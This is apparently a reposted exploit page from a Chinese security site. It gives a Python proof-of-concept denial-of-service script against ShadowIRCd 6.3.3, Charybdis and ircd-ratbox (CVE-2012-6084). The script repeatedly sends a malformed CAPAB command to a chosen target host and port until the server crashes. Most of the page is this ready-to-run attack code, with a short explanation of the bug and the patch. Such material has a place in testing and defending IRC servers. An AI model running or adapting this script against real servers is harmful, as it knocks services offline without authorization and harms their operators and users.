首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ratbox IRCd Denial Of Service
来源:zempirians.com 作者:Apetrick 发布时间:2013-01-05  
#!/usr/bin/python3
###################################################################################
#
#      _  _  .__                .__               
#   __| || |_|  |   ____   ____ |__| ____   ____  
#   \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#    |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \        http://www.zempirians.com
#   /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#     |_||_|           \/_____/                \/
#
#   00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#   Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
#             -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
#         [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
#	+VULNERABLE+
#       ../shadowircd/modules/m_capab.c - LINE(40)
#	{{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0.  (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
# 
# The bug has to do with server capability negotiation.  A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
# 
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue.  All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


def own( uri, port ):
        sock = socket.socket()
        try:
                ret = sock.connect_ex(( uri, int( port ) ))
        except:
                print( "\t[-] Failed To Connect To {}".format( uri ) )
                exit()

        print( "\t[+] Connected, Sending Payload To {}:{}".format(  uri, port ) )
        while True:
                try:
                        sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
                except socket.error as se:
                        print( '\t[!] Owned <3' )
                        break

        sock.close()

if __name__ == '__main__':
        parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )

        parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
        parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )

        args = parser.parse_args()

        own( args.target, args.port )

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress Plugin Advanced Cust
·Enterasys NetSight nssyslogd.e
·Allied Telesis AT-MCF2000M 3.0
·FoxPlayer v2.9.0 Denial of Ser
·Astium VoIP PBX <= v2.1 build
·Foxit Reader <= 5.4.4.1128 Fir
·Astium VoIP PBX 2.1 Remote Roo
·Ettercap <= 0.7.5.1 Stack Over
·Microsoft Internet Explorer CB
·XML-RPC PingBack API Remote Do
·BlazeDVD 6.1 PLF Exploit DEP/A
·WordPress Google Document Embe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved